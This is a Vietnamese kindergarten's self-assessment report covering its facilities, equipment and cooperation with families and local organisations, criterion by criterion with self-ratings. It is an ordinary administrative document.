Mở đầu: Trường Mầm non Phú Thành A có cơ sở vật chất khang trang, rộng thoáng mát, khuôn viên trường Xanh-sạch-đẹp, công trình bán kiên cố. Các phòng chức năng và khu hành chánh đảm bảo đúng theo quy định. Trường có khu vực sân chơi riêng đảm bảo cho trẻ có đầy đủ các loại đồ chơi, có vườn cây đảm bảo cho trẻ khám phá phát triển tư duy. Hằng năm, trường đã huy động các nguồn lực để tập trung cho các hoạt động giáo dục. Nhà trường đã sử dụng, quản lý cơ sở vật chất theo đúng quy định.

Tiêu chí 1: Diện tích, khuôn viên và các công trình của nhà trường theo quy định tại Điều lệ trường mầm non.

  1. a) Có đủ diện tích đất hoặc diện tích sàn sử dụng theo quy định, các công trình của nhà trường được xây dựng kiên cố hoặc bán kiên cố;
  2. b) Có biển tên trường, khuôn viên có tường, rào bao quanh;
  3. c) Có nguồn nước sạch và hệ thống cống rãnh hợp vệ sinh.
  4. Mô tả hiện trạng

Nhà trường có tổng diện tích đất là 2.315,7 m2, tính bình quân là 11,07m2/trẻ. Điểm trường Tân Dinh 382.84 m2 tính bình quân là 191.42 m2/ trẻ các điểm khác tổng diện tích 161,2 m2 tính bình quân là 1,67 m2/trẻ.  Các công trình của trường và điểm trường ấp Tân Dinh được xây dựng kiên cố, các điểm khác còn lại được xây dựng bán kiên cố và xây cất tạm gồm: 17 phòng, trong đó có 11 phòng học ( Có 01 phòng tạm), 01 phòng hiệu trưởng, 02 phòng chức năng, 01 phòng y tế học đường, 01 văn phòng, 01 phòng hành chính. [H3.3.01.01].

Điểm chính và điểm trường ấp Tân Dinh của trường có biển tên trường thực hiện theo quy định của Điều lệ trường mầm non, khuôn viên trường có tường, rào bao quanh đảm bảo an toàn cho trẻ. Các điểm Long An A, Long Thành học chung với các trường Tiểu học nên sử dụng chung bản tên trường và tường rào của trường tiểu học, trẻ được đảm bảo an toàn. [ H3.3.01.02],

Trường có thực hiện sử dụng nguồn nước sạch để nấu ăn và cho trẻ sinh hoạt hàng ngày. Tuy nhiên nguồn nước cho trẻ sinh hoạt và nấu ăn của trường được Trung tâm kỹ thuật thí nghiệm và ứng dụng kỹ thuật công nghệ Đồng Tháp thử nghiệm kết luận mẫu thử nghiệm có 1 chỉ tiêu Asen không đạt theo QCVN 02: 2009/BYT. Nguồn nước cho trẻ uống được hợp đồng từ cơ sở sản xuất nước uống đóng chai Cẩm Quyên được trung tâm kỹ thuật thí nghiệm và ứng dụng khoa học công nghệ Đồng Tháp kiểm tra thử nghiệm đạt tiêu chuẩn nước sạch và được bố trí cho mỗi lớp một bình còn hệ thống nước máy được đặt tại khu vực sạch sẽ và có kiểm định của y tế chứng nhận là nguồn nước sạch, có hệ thống cống rãnh thoát nước hợp vệ sinh [H3.3.01.03].

  1. Điểm mạnh

Trường có đủ diện tích theo qui định, các công trình của trường được xây dựng bán kiên cố. Trường và điểm trường Tân Dinh có biển tên trường và khuôn viên trường, có hàng rào bao quanh chắc chắn đảm bảo an toàn cho trẻ, sử dụng nguồn nước nấu ăn, vệ sinh hàng ngày và nước uống cho học sinh được đảm bảo  chất lượng nguồn sạch, hệ thống cống rãnh đảm bảo an toàn vệ sinh.

  1. Điểm yếu

Các điểm Long An A, Long Thành học chung với các trường Tiểu học nên sử dụng chung bản tên trường và tường rào của trường tiểu học.

  1. Kế hoạch cải tiến chất lượng

          Nhà trường tham mưu với UBND xã và Phòng GD-ĐT xin kinh phí xây dựng sân chơi điểm phụ Long An A.

  1. Tự đánh giá : Đạt.

Tiêu chí 2: Sân, vườn và khu vực cho trẻ chơi đảm bảo yêu cầu.

  1. a) Diện tích sân chơi được quy hoạch, thiết kế phù hợp, có cây xanh tạo bóng mát;
  2. b) Có vườn cây dành riêng cho trẻ chăm sóc, giúp trẻ khám phá, học tập;
  3. c) Khu vực trẻ chơi ngoài trời được lát gạch, láng xi măng hoặc trồng thảm cỏ; có ít nhất 5 loại đồ chơi ngoài trời theo danh mục thiết bị và đồ chơi ngoài trời cho GDMN
  4. Mô tả hiện trạng

Trường Mầm non Phú Thành A có tổng diện tích sân chơi là 837,44m2.  Trong đó diện tích sân chơi trường là 547m2, điểm trường Tân Dinh 290,44 m2 đảm bảo rộng, thoáng, được thiết kế phù hợp với trường mầm non, trường có cây xanh tạo bóng mát và trường được tỉnh kiểm tra công nhận đạt trường “Xanh – sạch – đẹp” vào năm học 2012-2013 và thực hiện công tác duy trì đạt chuẩn hàng năm. Còn 04 lớp các điểm khác Long An A, Long Thành sân chơi sử dụng chung với trường tiểu học [H3.3.02.01].

Sân trường có vườn cây dành riêng cho trẻ, có phân chia khu vực cho từng khối, lớp, trẻ thường xuyên chăm sóc tưới cây. Qua đó, giúp cho trẻ khám phá được thế giới xung quanh về thế giới thực vật: như cây lớn lên được là nhờ vào đâu, cách chăm sóc như thế nào?,  so sánh, phân loại cây. Điểm trường Tân Dinh chưa thực hiện được do mới xây cất còn các điểm Long An A, Long Thành học chung với  trường Tiểu học. [H3.3.02.02].  

Trường có khu vực trẻ chơi ngoài trời được bê tông hóa, trường có 7 đồ chơi ngoài trời theo danh mục thiết bị đó là: Cầu tuột, xích đu nhiều ghế, đu quay 8 chỗ, bộ vận động 3 khối nhà chòi thang leo và thăng bằng dao động 1, bập bênh Long thuyền, xích đu 3 dạng, mâm quay 6 ghế. Có tạo môi trường giáo dục ngoài trời cho trẻ vui chơi như: Xây hồ, bắt cầu khỉ, cầu ván… Các điểm Long An A, Long Thành chưa có đủ 5 loại đồ chơi ngoài trời theo qui định, điểm trường Tân Dinh khu vực chơi chưa được lát gạch, láng xi măng do mới xây cất. [H3.3.02.03].

  1. Điểm mạnh

Trường và các điểm trường có sân chơi rộng rãi và sạch sẽ, được quy hoạch cụ thể, có cây xanh, cây ăn quả, có vườn rau, bắt cầu tre, cầu ván… cho trẻ khám phá, trải nghiệm, chăm sóc. Có đủ 5 loại đồ chơi  ngoài trời, được bố trí phù hợp, đẹp mắt thu hút trẻ và đảm bảo an toàn cho trẻ vui chơi, hoạt động.

  1. Điểm yếu

Các điểm phụ chưa có đủ 5 loại đồ chơi ngoài trời theo qui định, điểm trường Tân Dinh khu vực chơi chưa được lát gạch, chưa có vườn cây dành riêng cho trẻ chăm sóc, giúp trẻ khám phá, học tập.

  1. Kế hoạch cải tiến chất lượng

Nhà trường có kế hoạch sửa chữa các đồ chơi ngoài trời trang bị cho các điểm phụ, tiết kiệm kinh phí láng xi măng sân chơi điểm phụ Tân Dinh trang bị đồ chơi ngoài trời cho các cháu vui chơi, chỉ đạo giáo viên dạy điểm Tân Dinh xây dựng vườn rau cho bé chăm sóc, khám phá.

  1. Tự đánh giá : Đạt

Tiêu chí 3: Phòng sinh hoạt chung, phòng ngủ và hiên chơi đảm bảo yêu cầu.

  1. a) Phòng sinh hoạt chung (có thể dùng làm nơi ăn, ngủ cho trẻ) đảm bảo các yêu cầu theo quy định tại Điều lệ trường mầm non, có đủ đồ dùng, đồ chơi, học liệu cho trẻ hoạt động; có tranh ảnh, hoa, cây cảnh trang trí đẹp, phù hợp;
  2. b) Phòng ngủ đảm bảo diện tích trung bình cho một trẻ và có các thiết bị theo quy định tại Điều lệ trường mầm non;
  3. c) Hiên chơi (vừa có thể là nơi trẻ ăn trưa) bảo đảm quy cách và diện tích trung bình cho một trẻ theo quy định tại Điều lệ trường mầm non, lan can của hiên chơi có khoảng cách giữa các thanh gióng đứng không lớn hơn 0,1m.
  4. Mô tả hiện trạng

Trường có 12 phòng sinh hoạt chung dùng làm nơi học tập, ăn, ngủ cho trẻ, được trang bị khá đầy đủ đồ dùng đồ chơi, có các thiết bị: Đèn, quạt, bàn, ghế, các tủ, kệ, giá để đồ chơi, học liệu cho trẻ hoạt động; có tranh ảnh, hoa, cây cảnh trang trí đẹp, phù hợp [H3.3.03.01].

Điểm chính và điểm trường Tân Dinh của trường có phòng sinh hoạt chung vừa dành cho trẻ học tập và ngủ chung một phòng diện tích 46m2 trung bình 1,42m2/ trẻ đảm bảo không khí yên tĩnh thoáng mát về mùa hè, ấm áp về mùa đông. Có các đồ dùng phục vụ cho trẻ như có chiếu, màn, gối, tủ đựng đồ dùng [H3.3.03.01].

Hiên chơi ở điểm chính (vừa có thể là nơi trẻ ăn trưa) trung bình 0,9 m2 /trẻ đảm bảo diện tích trung bình 0,5- 0,7m2 cho một trẻ, ở điểm phụ Tân Dinh trung bình 0,9 m2/trẻ, có xây lan can bao quanh đảm bảo an toàn cho trẻ Hiên chơi các điểm phụ còn lại diện tích trung bình 0,08 m2/ trẻ chưa đảm bảo diện tích trung bình cho một trẻ theo qui định. [H3.3.03.02].  

  1. Điểm mạnh

Trường có 12 phòng sinh hoạt chung vừa là phòng ngủ có đủ ánh sáng tự nhiên, đảm bảo thoáng mát về mùa hè và ấm áp về mùa đông, hiên chơi diện tích và chiều rộng đảm bảo. Có lan can bao bằng tường đảm bảo an toàn cho trẻ.

  1. Điểm yếu

Hiên chơi các điểm trường chưa đảm bảo diện tích theo qui định.

  1. Kế hoạch cải tiến chất lượng

Ban giám hiệu trường tích cực tham mưu với các cấp Lãnh Đạo xin cấp thêm quỹ đất để xây phòng học riêng cho các điểm phụ để có hiên chơi cho trẻ được đảm bảo diện tích theo qui định. Thời gian từ năm học 2016-2017 và những năm tiếp theo.

  1. Tự đánh giá: Đạt

Tiêu chí 4:  Phòng giáo dục thể chất, nghệ thuật, bếp ăn, nhà vệ sinh, theo quy định.

  1. a) Phòng giáo dục thể chất, nghệ thuật có diện tích tối thiểu là 60m2, có các thiết bị, đồ dùng phù hợp với hoạt động phát triển thẩm mỹ và thể chất của trẻ;
  2. b) Có bếp ăn được xây dựng theo quy trình vận hành một chiều, đồ dùng nhà bếp đầy đủ, đảm bảo vệ sinh; kho thực phẩm có phân chia thành khu vực để các loại thực phẩm riêng biệt, bảo đảm các quy định về vệ sinh an toàn thực phẩm; có tủ lạnh lưu mẫu thức ăn;
  3. c) Có nhà vệ sinh cho trẻ, nhà vệ sinh cho cán bộ, giáo viên, nhân viên đảm bảo yêu cầu và thuận tiện cho sử dụng.
  4. Mô tả hiện trạng

Nhà trường có phòng giáo dục thể chất, phòng nghệ thuật có diện tích mỗi phòng là 78,9m2, thoáng mát, đủ ánh sáng, để phục vụ các hoạt động nghệ thuật Tuy nhiên, do nhiều năm liền thiếu phòng học nên tạm mượn phòng nghệ thuật làm phòng học cho các cháu chưa được trang trí theo qui định của phòng âm nhạc. Văn phòng trường diện tích 21 m2 nhưng cán bộ giáo viên của trường thì khá đông khoảng 30 người không thể bố trí bàn ghế đủ cho cán bộ- giáo viên – nhân viên ngồi họp nên nhà trường đã tạm mượn phòng thể chất làm văn phòng do đó chưa trang bị dụng cụ chơi, tập cho trẻ đúng theo qui định. [H3.3.04.01].

Trường có bếp ăn được thực hiện theo quy định bếp ăn một chiều diện tích 56m2 được trang bị đầy đủ các đồ dùng để nấu ăn như: Tủ hấp cơm 30kg, bàn tiếp phẩm và sơ chế thực phẩm 2 tầng, bếp ga công nghiệp 2 lò không bình ga, bồn rửa thực phẩm 3 ngăn, kệ xoong 4 tầng, máy xây thịt, xe đẩy cơm và thức ăn 2 tầng, bộ dụng cụ để nấu thức ăn, bộ chậu ( Thau) đựng thức ăn chín, tủ lạnh 245 lít, bộ dụng cụ đựng thức ăn chín, các đồ dùng đảm bảo vệ sinh và có làm ký  hiệu chín – sống riêng. Có nội quy của nhà bếp, có bình chữa cháy và tiêu lệnh chữa cháy, 10 nguyên tắc vàng chế biến thức ăn. Có tủ lạnh và hộp lưu mẫu thức ăn sống, chín hàng ngày đúng theo quy định 24 giờ, có kho chứa thực phẩm, có phân chia thành khu vực để các loại thực phẩm riêng biệt, bảo đảm các quy định về vệ sinh an toàn thực phẩm. [H3.3.04.02].

Nhà trường và điểm Tân Dinh có nhà vệ sinh cho trẻ đảm bảo yêu cầu diện tích 5m2/nhà, mỗi phòng có phân khu vệ sinh dành riêng cho trẻ nam, nữ, có vách ngăn riêng cho từng hố xí, nhà vệ sinh được trang trí đẹp mắt có nước sạch và có bệ rửa tay vừa tầm với trẻ thuận tiện cho trẻ khi sử dụng. Trường có khu vệ sinh cho giáo viên, cán bộ, nhân viên: diện tích  9m2 có đủ nước sử dụng, có bồn rửa tay Các điểm khác trẻ đi vệ sinh nhờ trường tiểu học [H3.3.04.03].

  1. Điểm mạnh

Trường có phòng nghệ thuật, phòng thể chất, bếp ăn đảm bảo đủ diện tích theo qui định, có đồ dùng khá đầy đủ phân biệt dụng cụ sống – chín riêng, có tủ lạnh và hộp lưu mẫu thức ăn đầy đủ theo quy định. Nhà vệ sinh của trẻ và cán bộ, giáo viên và nhân viên đảm bảo theo yêu cầu đủ cho trẻ và giáo viên, nhân viên sử dụng.

  1. Điểm yếu

Phòng nghệ thuật chưa sử dụng đúng mục đích theo qui định. Bếp ăn chưa được xây dựng theo quy trình bếp một chiều, còn mượn tạm phòng nghệ thuật làm phòng học.

  1. Kế hoạch cải tiến chất lượng

BGH tích cực tham mưu với lãnh đạo địa phương, với Phòng giáo dục và Đào tạo xây dựng thêm phòng học để sử dụng đúng mục đích phòng nghệ thuật, xây dựng văn phòng có diện tích rộng rãi đảm bảo cho công tác hội họp để trả lại phòng thể chất sử dụng đúng mục đích.

  1. Tự đánh giá: Không Đạt

Tiêu chí 5: Khối phòng hành chính quản trị đảm bảo yêu cầu.

  1. a) Văn phòng trường có diện tích tối thiểu 30m2, có bàn ghế họp và tủ văn phòng, có các biểu bảng cần thiết; phòng hiệu trưởng, phó hiệu trưởng có diện tích tối thiểu 15m2, có đầy đủ các phương tiện làm việc và bàn ghế tiếp khách; phòng hành chính quản trị có diện tích tối thiểu 15m2, có máy vi tính và các phương tiện làm việc;
  2. b) Phòng Y tế có diện tích tối thiểu 10m2, có các trang thiết bị y tế và đồ dùng theo dõi sức khoẻ trẻ, có bảng thông báo các biện pháp tích cực can thiệp chữa bệnh và chăm sóc trẻ suy dinh dưỡng, trẻ béo phì, có bảng theo dõi tiêm phòng và khám sức khoẻ định kỳ cho trẻ, có tranh ảnh tuyên truyền chăm sóc sức khoẻ, phòng bệnh cho trẻ;
  3. c) Phòng bảo vệ, thường trực có diện tích tối thiểu 6m2, có bàn ghế, đồng hồ, bảng, sổ theo dõi khách; phòng dành cho nhân viên có diện tích tối thiểu 16m2, có tủ để đồ dùng cá nhân; khu để xe cho cán bộ, giáo viên, nhân viên có đủ diện tích và có mái che.
  4. Mô tả hiện trạng

Trường có 01 văn phòng trường diện tích 21m2 có bộ bàn và 30 ghế ngồi họp, có biểu bảng theo qui định, 01 tủ đựng hồ sơ; 01 phòng hiệu trưởng có diện tích 21m2, có 01 bàn làm việc và 02 máy vi tính, có 01 tủ sách pháp luật, 01 tủ hồ sơ và 01 bộ ghế Salon tiếp khách,  01 biểu bảng theo qui định. Phòng phó hiệu trưởng chưa có hiện đang tạm mượn văn phòng trường có phương tiện làm việc như:  02 bàn làm việc, 02 máy vi tính, có 4 tủ để hồ sơ, 1 tủ sách pháp luật,; Phòng hành chính quản trị có diện tích 21m2, có 01 máy vi tính và các phương tiện làm việc của kế toán, Tuy nhiên  văn phòng chưa đảm bảo diện tích theo qui định do thiết kế chưa bám theo điều lệ trường mầm non hiện đang tạm mượn làm phòng phó hiệu trưởng, tạm mượn phòng thể chất làm văn phòng trường.  [H3.3.05.01].

Phòng y tế có diện tích 12m2 có nhà vệ sinh, có các trang thiết bị y tế và các đồ dùng theo dõi sức khỏe cho trẻ như: Giường bệnh, tủ để thuốc cho trẻ loại thuốc thông thường như paracetamol, clomenyramin, dầu gió…và các dụng cụ y tế: gạt đè lưỡi, bông, băng cá nhân …. và đồ dùng theo dõi sức khỏe trẻ. Có các bảng biểu thông báo các biện pháp tích cực can thiệp chữa bệnh và chăm sóc trẻ suy dinh dưỡng, trẻ béo phì. Có các bảng kế hoạch theo dõi tiêm phòng và khám sức khỏe định kì của trẻ, có tranh ảnh tuyên truyền chăm sóc sức khỏe, phòng bệnh cho trẻ như: bệnh tay – chân – miệng, bệnh sốt xuất huyết, bệnh sởi- Rubenla-… [H3.3.05.02].

Nhà trường chưa có phòng bảo vệ, phòng nhân viên 16m2 và tủ  để đồ dùng cá nhân, bàn ghế, đồng hồ, bảng theo qui định, bảo vệ có lập sổ theo dõi khách;  có khu để xe cho giáo viên, nhân viên có diện tích 5.5m2 có mái che để bảo quản tốt tài sản của giáo viên, nhân viên. và chưa có phòng dành cho nhân viên do theo thiết kế. [H3.3.05.03].

  1. Điểm mạnh

Trường có văn phòng trường, phòng hiệu trưởng, phòng phó hiệu trưởng và phòng hành chính quản trị, phòng y tế. Các phòng có trang bị khá đầy đủ các phương tiện để làm việc, phòng y tế được bố trí ở tầng trệt nên rất thuận tiện cho việc tiếp xúc với Phụ huynh.

  1. Điểm yếu

Thiếu phòng phó hiệu trưởng, phòng nhân viên, phòng bảo vệ và các phương tiện làm việc của phòng bảo vệ. Diện tích văn phòng chưa đảm bảo theo qui định và văn phòng trường, phòng thể chất chưa sử dụng đúng mục đích  do thiết kế xây dựng thiếu.

  1. Kế hoạch cải tiến chất lượng

Trường tiếp tục tham mưu đến các cấp Lãnh đạo sớm xây cất thêm phòng  nhân viên, phòng bảo vệ, văn phòng trường, chuyển mục đích sử dụng văn phòng trường cho phòng phó hiệu trưởng và  sắp xếp các phòng đúng chức năng, thời gian đến cuối năm học 2016-2017 và những năm tiếp theo.

  1. Tự đánh giá: Không đạt

Tiêu chí 6: Các thiết bị, đồ dùng, đồ chơi theo Tiêu chuẩn kỹ thuật Đồ dùng- Đồ chơi- Thiết bị dạy học tối thiểu dùng cho giáo dục mầm non.

  1. a) Có đủ thiết bị, đồ dùng, đồ chơi theo quy định và sử dụng có hiệu quả trong chăm sóc, giáo dục trẻ;
  2. b) Các thiết bị, đồ dùng, đồ chơi ngoài danh mục quy định phải bảo đảm tính giáo dục, an toàn, phù hợp với trẻ;
  3. c) Hằng năm sửa chữa, thay thế, bổ sung, nâng cấp thiết bị, đồ dùng, đồ chơi.
  4. Mô tả hiện trạng

Nhà trường có trang bị tương đối đầy đủ thiết bị, đồ chơi, theo quy định Thông tư số 02/2010/TT- BGDĐT và TT 34 của Bộ Giáo dục cụ thể: Nhà trẻ 45/83 tỷ lệ 40,90%, lớp mầm 50/95 tỷ lệ: 52.63%, khối chồi: 48/117 tỷ lệ 41,02%, khối Lá: Trung bình 111/114 đạt 80-97,4%. Giáo viên sử dụng các thiết bị, đồ dùng cho từng hoạt động phù hợp và có hiệu quả. Số lượng đồ dùng theo quy định Thông tư số 02/2010/TT-BGDĐT ở các lớp dưới 5 tuổi chưa đảm bảo theo quy định. Nguyên nhân do số lượng đồ dùng, đồ chơi theo quy định nhiều nhưng kinh phí của trường rất hạn chế, các năm gần đây tập trung cho các lớp 5 tuổi để thực hiện công tác PCGDMNTNT nên khó khăn trong việc trang bị đầy đủ cho các lớp [H3.3.06.01].

Các thiết bị đồ dùng đồ chơi ngoài danh mục như: Các loại mũ múa, tranh ảnh chủ đề, đồ chơi các đồ vật, con vật… đồ dùng có tính đảm bảo an toàn, có tính giáo dục và phù hợp với trẻ [H3.3.06.02].

Hằng năm nhà trường có kế hoạch sửa chữa và sơn mới các đồ chơi ngoài trời với kinh phí: 17.490.000 đồng, bổ sung, mua sắm, thay thế đồ dùng theo Thông tư 02/2010/TT-BGDĐT với tổng số tiền là: 37.263.481 đồng. Ngoài ra tổ chức cho giáo viên tự làm đồ dùng hàng tháng để phục vụ cho quá trình chơi và học của trẻ [H3.3.06.03].

  1. Điểm mạnh

Nhà trường có các đồ dùng, đồ chơi theo Thông tư 02/2010/TT-BGDĐT cho các lớp 5 – 6 tuổi đạt 80-98%. Các thiết bị, đồ dùng, đồ chơi ngoài danh mục qui định đảm bảo tính giáo dục, an toàn, phù hợp với trẻ. Nhà trường có kế hoạch và đã thực hiện sửa chữa, bổ sung, thay thế mua sắm đồ dùng, đồ chơi cho các lớp với tổng  kinh phí là 54.753.481 đồng.

  1. Điểm yếu

Đồ dùng đồ chơi các lớp dưới 5 tuổi chưa đủ theo qui định theo Thông tư số 02/2010/TT-BGDĐT.

  1. Kế hoạch cải tiến chất lượng

Nhà trường tham mưu với lãnh đạo Phòng Giáo dục và Đào tạo hỗ trợ trang bị thêm đồ dùng, đồ chơi cho các lớp còn thiếu, cân đối kinh phí để mua sắm thiết bị đồ dùng phân phối cho các lớp trong đó ưu tiên các lớp bán trú, vận động các mạnh thường quân hỗ trợ kinh phí hoặc đồ dùng, dụng cụ cho giáo viên làm đồ dùng đồ chơi hàng tháng để dần trang bị cho các lớp còn thiếu, thời gian cuối năm học 2016-2017.

  1. Tự đánh giá: Không Đạt

Kết luận tiêu chuẩn 3: Cơ sở vật chất và trang thiết bị

  1. Điểm mạnh cơ bản

Trường có diện tích, khuôn viên và các công trình đảm bảo yêu cầu về thiết kế theo quy định của Điều lệ trường Mầm non, có cổng trường, có hàng rào xung quanh, có sân chơi, đảm bảo đủ phòng học. Có nguồn nước sạch, hệ thống cây xanh vườn cây cho trẻ khám phá; có phòng sinh hoạt chung, khối phòng hành chính quản trị đảm bảo yêu cầu; Có đủ sách báo, thiết bị, đồ dùng, đồ chơi theo quy định của Bộ GD&ĐT và hàng năm có sửa chữa thay thế, bổ sung. Có khu vệ sinh cho trẻ và cho cán bộ giáo viên, nhân viên.

  1. Điểm yếu cơ bản

Các điểm Long An A, Long Thành chưa có đủ 5 loại đồ chơi ngoài trời theo qui định, điểm trường Tân Dinh khu vực chơi chưa được lát gạch, phòng nghệ thuật, thể chất của trường chưa sử dụng đúng mục đích theo qui định. Bếp ăn chưa được xây dựng theo quy trình bếp ăn một chiều, thiếu một số phòng theo qui định như: Phòng nhân viên, phòng bảo vệ do thiết kế xây dựng thiếu, số lượng đồ dùng theo quy định Thông tư số 02/2010/TT-BGDĐT ở các lớp dưới 5 tuổi chưa đảm bảo theo quy định.

+ Số tiêu chí đạt: 3/6 tiêu chí

+ Số tiêu chí không đạt: 3/6 tiêu chí.

 Tiêu chuẩn 4: Quan hệ giữa nhà trường, gia đình và xã hội

Mở đầu: Nhà trường có Ban đại diện cha mẹ trẻ của trường và các lớp hoạt động theo đúng quy định, luôn chủ động phối hợp với cha mẹ trẻ trong việc chăm sóc, giáo dục trẻ. Giáo viên và gia đình thường xuyên trao đổi thông tin về trẻ. Nhà trường thường xuyên tham mưu với cấp ủy Đảng, chính quyền địa phương và phối hợp với các tổ chức đoàn thể, cá nhân ở địa phương huy động các nguồn lực nhằm nâng cao chất lượng nuôi dưỡng, chăm sóc, giáo dục trẻ, tăng cường cơ sở vật chất và tinh thần,  xây dựng môi trường giáo dục an toàn, lành mạnh.

 Tiêu chí 1: Nhà trường chủ động phối hợp với cha mẹ trẻ để nâng cao chất lượng nuôi dưỡng, chăm sóc, giáo dục trẻ.

  1. a) Có Ban đại diện cha mẹ trẻ em theo quy định tại điều lệ trường mầm non;
  2. b) Có các biện pháp và hình thức phù hợp để tuyên truyền, hướng dẫn cha mẹ trẻ nuôi dưỡng, chăm sóc, giáo dục trẻ khi ở nhà;
  3. c) Giáo viên phụ trách nhóm trẻ, lớp mẫu giáo và gia đình thường xuyên trao đổi thông tin về trẻ.
  4. Mô tả hiện trạng

Đầu năm học các lớp tiến hành thành lập Ban đại diện cha mẹ trẻ em của mỗi lớp gồm 3 thành viên, trên cơ sở các thành viên của lớp nhà trường tiến hành đại hội phụ huynh bàu ban đại diện cha mẹ trẻ em của trường gồm 19 thành viên do UBND xã ra quyết định. BĐDCMTE của trường hoạt động theo Điều lệ Ban đại diện cha mẹ học sinh [H4.4.01.01].

Giáo viên chủ nhiệm các lớp và bộ phận YTHĐ thường xuyên lồng ghép các nội dung tuyên truyền vào các buổi sinh hoạt với cha mẹ trẻ, tại các buổi tuyên truyền giáo viên hướng dẫn cha mẹ trẻ chăm sóc, giáo dục trẻ khi ở nhà như: cho trẻ ăn uống đầy đủ chất dinh dưỡng theo độ tuổi, tham gia các hoạt động phù hợp với độ tuổi; tuyên truyền đến cha mẹ trẻ cách chăm sóc, giáo dục trẻ  tại gia đình, giáo dục kỹ năng sống cho trẻ hướng dẫn phụ huynh cách phòng chống các tai nạn thương tích thường xảy ra với trẻ… thông qua các hình thức như: bản tin của lớp, của trường, qua các buổi họp với cha mẹ trẻ [H4.4.01.02].

Giáo viên phụ trách nhóm trẻ, lớp mẫu giáo luôn quan sát trẻ qua các hoạt động ăn, ngủ, chơi…luôn chủ động và thường xuyên trao đổi thông tin của trẻ về tình hình sức khỏe, ăn, ngủ và các hoạt động khác của trẻ với gia đình để có sự phối hợp giữa nhà trường, gia đình trong công tác chăm sóc giáo dục trẻ nhằm giúp trẻ phát triển toàn diện thông qua giờ đón trẻ, trả trẻ, bản tin của lớp, bản tuyên truyền, sổ liên lạc. Còn một số phụ huynh chưa thường xuyên tham gia hội họp do hoàn cảnh kinh tế phải đi làm ăn xa, một số phụ huynh chưa quan tâm đến việc học tập của con em mình nên còn hạn chế trong vấn đề hội họp [H4.4.01.03].

  1. Điểm mạnh

Nhà trường có thành lập Ban đại diện cha mẹ trẻ em của lớp, Ban đại diện cha mẹ trẻ em của trường gồm 19 thành viên theo quy định của Điều lệ trường mầm non và Thông tư 55 của Bộ giáo dục. Ban đại diện cha mẹ học sinh của trường hoạt động theo Điều lệ Ban đại diện cha mẹ học sinh. Giáo viên chủ nhiệm các lớp và bộ phận có các biện pháp và hình thức tuyên truyền, hướng dẫn cha mẹ trẻ chăm sóc, giáo dục trẻ khi ở nhà. Giáo viên có sự trao đổi thông tin thường xuyên về tình hình sức khỏe, ăn, ngủ, học tập của trẻ giữa nhà trường và gia đình.

  1. Điểm yếu

Còn một số phụ huynh chưa thường xuyên tham gia hội họp do hoàn cảnh kinh tế phải đi làm ăn xa, một số phụ huynh chưa quan tâm đến việc học tập của con em mình nên còn hạn chế trong vấn đề hội họp.

  1. Kế hoạch cải tiến chất lượng

Năm học 2016-2017 Ban giám hiệu nhà trường thực hiện tốt công tác phối hợp với BĐDCMHS phụ huynh qua buổi họp lệ nhờ BĐDCMHS tuyên truyền vận động phụ huynh quan tâm hơn việc học của con em mình..

Đối với những phụ huynh đi làm ăn xa thì giáo viên liên hệ với phụ huynh của lớp thông qua giờ trả trẻ và qua điện thoại.

  1. Tự đánh giá: Đạt

           Tiêu chí 2: Nhà trường chủ động tham mưu với cấp ủy Đảng, chính quyền và phối hợp với các tổ chức, đoàn thể, cá nhân của địa phương.

  1. a) Chủ động tham mưu với cấp uỷ Đảng, chính quyền địa phương ban hành chính sách phù hợp để nâng cao chất lượng nuôi dưỡng, chăm sóc, giáo dục trẻ;
  2. b) Phối hợp có hiệu quả với các tổ chức, đoàn thể, cá nhân để huy động các nguồn lực xây dựng cơ sở vật chất cho nhà trường;
  3. c) Phối hợp chặt chẽ với các tổ chức, đoàn thể, cá nhân để xây dựng môi trường giáo dục lành mạnh, an toàn cho trẻ.
  4. Mô tả hiện trạng

 Nhà trường thường xuyên tham mưu với cấp ủy Đảng, chính quyền địa phương, các mạnh thường quân nhằm chỉ đạo kịp thời và có hỗ trợ cho học sinh với tổng số tiền 7.530.000đồng, cụ thể: Hỗ trợ đêm hội trăng rằm: 423 cái bánh trung thu, tặng quà cây mùa xuân 26 phần quà qui đổi 2.900.000đ, hội khuyến học khen thưởng tổng kết năm học 400 quyển vở, nhằm khích lệ tinh thần trẻ trong quá trình học tập và nâng cao chất lượng chăm sóc, giáo dục trẻ tại trường, xây dựng kế hoạch thực hiện đề án phổ cập cho trẻ em 5 tuổi, tham mưu về xây dựng 02 phòng học điểm trường Tân Dinh. [H4.4.02.01]

Nhà trường với các đoàn thể của địa phương như: Hội khuyến học, hội Chữ thập đỏ, Trạm Y tế, Hội liên hiệp phụ nữ, Xã đoàn, Đài truyền thanh, công an, BĐDCMHS. CMHS đóng góp để tạo môi trường hoạt động ngoài trời: 6 cây tre làm cầu khỉ, cây Bạch đàn cưa thành ván, bánh xe hơi: 2 cái, 6 ngày công của 6 người/2 ngày, tổng cộng tương đương 2.350.000đ, vận động học sinh ra lớp, duy trì sĩ số…CMHS đóng góp. Việc  phối hợp với các tổ chức đoàn thể chưa được thường xuyên do nhà trường bận nhiều công việc phải tổ chức các hoạt động, lễ hội liên tục. [H4.4.02.02].

Nhà trường có phối hợp với các tổ chức, đoàn thể, cá nhân ở địa phương xây dựng nhà trường. Trường đạt xanh – sạch – đẹp, xây dựng vào năm 2012- 2013 môi trường giáo dục lành mạnh, tham gia  an toàn cho trẻ như phối hợp với phụ huynh sơn, sữa hàng rào, sắp xếp ghế đá, thay cây cỗi, tu sửa bàn ghế, đồ dùng đồ chơi ngòai trời, trong lớp.[H4.4.02.03].

  1. Điểm mạnh

Nhà trường luôn chủ động trong công tác tham mưu với cấp ủy Đảng, chính quyền địa phương để đưa ra các chính sách phù hợp để nâng cao chất lượng chăm sóc, giáo dục trẻ. Phối hợp với các đoàn thể của địa phương với Ban đại diện cha mẹ học sinh, công đoàn, chi đoàn và các mạnh thường quân hỗ trợ hiện vật qui đổi thành tiền: 7.530.000đồng xây dựng cơ sở vật chất của nhà trường, tạo cảnh quang xanh-sạch- đẹp lành mạnh an toàn cho trẻ.

  1. Điểm yếu

Việc phối hợp với các tổ chức đoàn thể chưa được thường xuyên do nhà trường bận nhiều công việc phải tổ chức các hoạt động, lễ hội liên tục.

  1. Kế hoạch cải tiến chất lượng

Ban giám hiệu và giáo viên chủ viên và các đoàn thể của trường sắp xếp thời gian khoa học để thường xuyên phối hợp với các tổ chức trong và ngoài nhà trường nhằm mang lại hiệu quả cao hơn  đáp ứng nhu cầu chăm sóc giáo dục trẻ, thời gian thực hiện đến cuối học kỳ I năm học 2016-2017.

  1. Tự đánh giá: Đạt

